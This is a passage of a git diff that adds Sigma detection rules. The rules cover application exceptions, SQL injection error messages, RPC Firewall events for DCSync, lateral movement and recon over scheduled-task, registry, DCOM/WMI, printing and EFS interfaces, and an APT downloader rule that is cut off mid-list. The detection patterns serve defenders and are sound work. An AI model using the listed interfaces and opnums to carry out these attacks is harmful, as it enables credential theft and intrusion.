- PermissionDenied + condition: keywords +falsepositives: + - Application bugs +level: medium +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_application/python/app_python_sql_exceptions.yml b/bin/main/rules/others_application/python/app_python_sql_exceptions.yml new file mode 100644 index 000000000..fcc646a69 --- /dev/null +++ b/bin/main/rules/others_application/python/app_python_sql_exceptions.yml @@ -0,0 +1,25 @@ +title: Python SQL Exceptions +id: 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9 +status: stable +description: Generic rule for SQL exceptions in Python according to PEP 249 +author: Thomas Patzke +date: 2017/08/12 +modified: 2020/09/01 +references: + - https://www.python.org/dev/peps/pep-0249/#exceptions +logsource: + category: application + product: python +detection: + keywords: + - DataError + - IntegrityError + - ProgrammingError + - OperationalError + condition: keywords +falsepositives: + - Application bugs +level: medium +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml new file mode 100644 index 000000000..66ec17a1d --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml @@ -0,0 +1,34 @@ +title: Remote Schedule Task Lateral Movement via ATSvc +id: 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb +description: Detects remote RPC calls to create or execute a scheduled task via ATSvc +references: + - https://attack.mitre.org/techniques/T1053/ + - https://attack.mitre.org/tactics/TA0008/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement + - attack.t1053 + - attack.t1053.002 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b + OpNum: + - 0 + - 1 + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_recon.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_recon.yml new file mode 100644 index 000000000..9bece1cfc --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_recon.yml @@ -0,0 +1,31 @@ +title: Remote Schedule Task Recon via AtScv +id: f177f2bc-5f3e-4453-b599-57eefce9a59c +description: Detects remote RPC calls to read information about scheduled tasks via AtScv +references: + - https://attack.mitre.org/tactics/TA0007/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 + - https://github.com/zeronetworks/rpcfirewall + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b + filter: + OpNum: + - 0 + - 1 + condition: selection and not filter +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_dcsync_attack.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_dcsync_attack.yml new file mode 100644 index 000000000..badff3ec5 --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_dcsync_attack.yml @@ -0,0 +1,33 @@ +title: Possible DCSync Attack +id: 56fda488-113e-4ce9-8076-afc2457922c3 +description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks. +references: + - https://attack.mitre.org/techniques/T1033/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-DRSR.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.t1033 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes, enable DRSR UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2) for "dangerous" opcodes (not 0,1 or 12) only from trusted IPs (DCs)' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2 + filter: + OpNum: + - 0 + - 1 + - 12 + condition: selection and not filter +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_efs_abuse.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_efs_abuse.yml new file mode 100644 index 000000000..46b0150c2 --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_efs_abuse.yml @@ -0,0 +1,30 @@ +title: Remote Encrypting File System Abuse +id: 5f92fff9-82e2-48eb-8fc1-8b133556a551 +description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR +references: + - https://attack.mitre.org/tactics/TA0008/ + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-EFSR.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:df1941c5-fe89-4e79-bf10-463657acf44d or c681d488-d850-11d0-8c52-00c04fd90f7e' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: + - df1941c5-fe89-4e79-bf10-463657acf44d + - c681d488-d850-11d0-8c52-00c04fd90f7e + condition: selection +falsepositives: + - Legitimate usage of remote file encryption +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_eventlog_recon.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_eventlog_recon.yml new file mode 100644 index 000000000..d508eb6ba --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_eventlog_recon.yml @@ -0,0 +1,27 @@ +title: Remote Event Log Recon +id: 2053961f-44c7-4a64-b62d-f6e72800af0d +description: Detects remote RPC calls to get event log information via EVEN or EVEN6 +references: + - https://attack.mitre.org/tactics/TA0007/ + - https://github.com/zeronetworks/rpcfirewall + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:82273fdc-e32a-18c3-3f78-827929dc23ea and uuid:f6beaff7-1e19-4fbb-9f8f-b89e2018337c"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: + - 82273fdc-e32a-18c3-3f78-827929dc23ea + - f6beaff7-1e19-4fbb-9f8f-b89e2018337c + condition: selection +falsepositives: + - Remote administrative tasks on Windows Events +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml new file mode 100644 index 000000000..f2b230198 --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml @@ -0,0 +1,42 @@ +title: Remote Schedule Task Lateral Movement via ITaskSchedulerService +id: ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d +description: Detects remote RPC calls to create or execute a scheduled task +references: + - https://attack.mitre.org/techniques/T1053/ + - https://attack.mitre.org/tactics/TA0008/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement + - attack.t1053 + - attack.t1053.002 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"' + +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c + OpNum: + - 1 + - 3 + - 4 + - 10 + - 11 + - 12 + - 13 + - 14 + - 15 + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml new file mode 100644 index 000000000..8df44f543 --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml @@ -0,0 +1,37 @@ +title: Remote Schedule Task Recon via ITaskSchedulerService +id: 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e +description: Detects remote RPC calls to read information about scheduled tasks +references: + - https://attack.mitre.org/tactics/TA0007/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c + filter: + OpNum: + - 1 + - 3 + - 4 + - 10 + - 11 + - 12 + - 13 + - 14 + - 15 + condition: selection and not filter +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml new file mode 100644 index 000000000..efc3afa76 --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml @@ -0,0 +1,34 @@ +title: Remote Printing Abuse for Lateral Movement +id: bc3a4b0c-e167-48e1-aa88-b3020950e560 +description: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR +references: + - https://attack.mitre.org/tactics/TA0008/ + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1 + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RPRN-PAR.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:12345678-1234-abcd-ef00-0123456789ab or 76f03f96-cdfd-44fc-a22c-64950a001209 or ae33069b-a2a8-46ee-a235-ddfd339be281 or 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: + - 12345678-1234-abcd-ef00-0123456789ab + - 76f03f96-cdfd-44fc-a22c-64950a001209 + - 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1 + - ae33069b-a2a8-46ee-a235-ddfd339be281 + condition: selection +falsepositives: + - Actual printing +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml new file mode 100644 index 000000000..ea909d4da --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml @@ -0,0 +1,37 @@ +title: Remote DCOM/WMI Lateral Movement +id: 68050b10-e477-4377-a99b-3721b422d6ef +description: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI. +references: + - https://attack.mitre.org/tactics/TA0008/ + - https://attack.mitre.org/techniques/T1021/003/ + - https://attack.mitre.org/techniques/T1047/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9 + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement + - attack.t1021.003 + - attack.t1047 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: + - 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 + - 99fcfec4-5260-101b-bbcb-00aa0021347a + - 000001a0-0000-0000-c000-000000000046 + - 00000131-0000-0000-c000-000000000046 + - 00000143-0000-0000-c000-000000000046 + - 00000000-0000-0000-c000-000000000046 + condition: selection +falsepositives: + - Some administrative tasks on remote host +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml new file mode 100644 index 000000000..d6c6eacab --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml @@ -0,0 +1,40 @@ +title: Remote Registry Lateral Movement +id: 35c55673-84ca-4e99-8d09-e334f3c29539 +description: Detects remote RPC calls to modify the registry and possible execute code +references: + - https://attack.mitre.org/techniques/T1112/ + - https://attack.mitre.org/tactics/TA0008/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RRP.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003 + OpNum: + - 6 + - 7 + - 8 + - 13 + - 18 + - 19 + - 21 + - 22 + - 23 + - 35 + condition: selection +falsepositives: + - Remote administration of registry values +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_recon.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_recon.yml new file mode 100644 index 000000000..237e3d5ea --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_recon.yml @@ -0,0 +1,38 @@ +title: Remote Registry Recon +id: d8ffe17e-04be-4886-beb9-c1dd1944b9a8 +description: Detects remote RPC calls to collect information +references: + - https://attack.mitre.org/tactics/TA0007/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RRP.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003 + filter: + OpNum: + - 6 + - 7 + - 8 + - 13 + - 18 + - 19 + - 21 + - 22 + - 23 + - 35 + condition: selection and not filter +falsepositives: + - Remote administration of registry values +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml new file mode 100644 index 000000000..33edaab4b --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml @@ -0,0 +1,28 @@ +title: Remote Server Service Abuse +id: b6ea3cc7-542f-43ef-bbe4-980fbed444c7 +description: Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS +references: + - https://attack.mitre.org/tactics/TA0008/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SRVS.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188 + condition: selection +falsepositives: + - Legitimate remote share creation +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml new file mode 100644 index 000000000..10bdf7a1e --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml @@ -0,0 +1,30 @@ +title: Remote Server Service Abuse for Lateral Movement +id: 10018e73-06ec-46ec-8107-9172f1e04ff2 +description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR +references: + - https://attack.mitre.org/tactics/TA0008/ + - https://attack.mitre.org/techniques/T1569/002/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SCMR.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement + - attack.t1569.002 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 367abb81-9844-35f1-ad32-98f038001003 + condition: selection +falsepositives: + - Administrative tasks on remote services +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml new file mode 100644 index 000000000..45f389dcd --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml @@ -0,0 +1,34 @@ +title: Remote Schedule Task Lateral Movement via SASec +id: aff229ab-f8cd-447b-b215-084d11e79eb0 +description: Detects remote RPC calls to create or execute a scheduled task via SASec +references: + - https://attack.mitre.org/techniques/T1053/ + - https://attack.mitre.org/tactics/TA0008/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.lateral_movement + - attack.t1053 + - attack.t1053.002 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f + OpNum: + - 0 + - 1 + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_recon.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_recon.yml new file mode 100644 index 000000000..1ce665d32 --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_recon.yml @@ -0,0 +1,30 @@ +title: Remote Schedule Task Lateral Movement via SASec +id: 0a3ff354-93fc-4273-8a03-1078782de5b7 +description: Detects remote RPC calls to read information about scheduled tasks via SASec +references: + - https://attack.mitre.org/tactics/TA0007/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f + filter: + OpNum: + - 0 + - 1 + condition: selection and not filter +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml new file mode 100644 index 000000000..dd9d1b6cd --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml @@ -0,0 +1,29 @@ +title: SharpHound Recon Account Discovery +id: 65f77b1e-8e79-45bf-bb67-5988a8ce45a5 +description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership. +references: + - https://attack.mitre.org/techniques/T1087/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-WKST.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.t1087 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:6bffd098-a112-3610-9833-46c3f87e345a opnum:2' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a + OpNum: 2 + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml new file mode 100644 index 000000000..b2a92416a --- /dev/null +++ b/bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml @@ -0,0 +1,29 @@ +title: SharpHound Recon Sessions +id: 6d580420-ff3f-4e0e-b6b0-41b90c787e28 +description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership. +references: + - https://attack.mitre.org/techniques/T1033/ + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183 + - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SRVS.md + - https://github.com/zeronetworks/rpcfirewall + - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/ +tags: + - attack.t1033 +status: experimental +author: Sagie Dulce, Dekel Paz +date: 2022/01/01 +modified: 2022/01/01 +logsource: + product: rpc_firewall + category: application + definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188 opnum:12' +detection: + selection: + EventLog: RPCFW + EventID: 3 + InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188 + OpNum: 12 + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_application/ruby/appframework_ruby_on_rails_exceptions.yml b/bin/main/rules/others_application/ruby/appframework_ruby_on_rails_exceptions.yml new file mode 100644 index 000000000..0c2e54770 --- /dev/null +++ b/bin/main/rules/others_application/ruby/appframework_ruby_on_rails_exceptions.yml @@ -0,0 +1,29 @@ +title: Ruby on Rails Framework Exceptions +id: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a +status: stable +description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts +author: Thomas Patzke +date: 2017/08/06 +modified: 2020/09/01 +references: + - http://edgeguides.rubyonrails.org/security.html + - http://guides.rubyonrails.org/action_controller_overview.html + - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception + - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb +logsource: + category: application + product: ruby_on_rails +detection: + keywords: + - ActionController::InvalidAuthenticityToken + - ActionController::InvalidCrossOriginRequest + - ActionController::MethodNotAllowed + - ActionController::BadRequest + - ActionController::ParameterMissing + condition: keywords +falsepositives: + - Application bugs +level: medium +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_application/spring/appframework_spring_exceptions.yml b/bin/main/rules/others_application/spring/appframework_spring_exceptions.yml new file mode 100644 index 000000000..c3fe5e068 --- /dev/null +++ b/bin/main/rules/others_application/spring/appframework_spring_exceptions.yml @@ -0,0 +1,28 @@ +title: Spring Framework Exceptions +id: ae48ab93-45f7-4051-9dfe-5d30a3f78e33 +status: stable +description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts +author: Thomas Patzke +date: 2017/08/06 +modified: 2020/09/01 +references: + - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html +logsource: + category: application + product: spring +detection: + keywords: + - AccessDeniedException + - CsrfException + - InvalidCsrfTokenException + - MissingCsrfTokenException + - CookieTheftException + - InvalidCookieException + - RequestRejectedException + condition: keywords +falsepositives: + - Application bugs +level: medium +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_application/sql/app_sqlinjection_errors.yml b/bin/main/rules/others_application/sql/app_sqlinjection_errors.yml new file mode 100644 index 000000000..3a9366fd6 --- /dev/null +++ b/bin/main/rules/others_application/sql/app_sqlinjection_errors.yml @@ -0,0 +1,30 @@ +title: Suspicious SQL Error Messages +id: 8a670c6d-7189-4b1c-8017-a417ca84a086 +status: test +description: Detects SQL error messages that indicate probing for an injection attack +author: Bjoern Kimminich +references: + - http://www.sqlinjection.net/errors +date: 2017/11/27 +modified: 2021/11/27 +logsource: + category: application + product: sql +detection: + keywords: + # Oracle + - quoted string not properly terminated + # MySQL + - You have an error in your SQL syntax + # SQL Server + - Unclosed quotation mark + # SQLite + - 'near "*": syntax error' + - SELECTs to the left and right of UNION do not have the same number of result columns + condition: keywords +falsepositives: + - Application bugs +level: high +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_apt/apt_silence_downloader_v3.yml b/bin/main/rules/others_apt/apt_silence_downloader_v3.yml new file mode 100644 index 000000000..d63c19959 --- /dev/null +++ b/bin/main/rules/others_apt/apt_silence_downloader_v3.yml @@ -0,0 +1,39 @@ +title: Silence.Downloader V3 +id: 170901d1-de11-4de7-bccb-8fa13678d857 +status: test +description: Detects Silence downloader. These commands are hardcoded into the binary. +author: Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community +date: 2019/11/01 +modified: 2021/11/27 +logsource: + category: process_creation + product: windows +detection: + selection_recon: + Image|endswith: + - '\tasklist.exe' + - '\qwinsta.exe' + - '\ipconfig.exe' + - 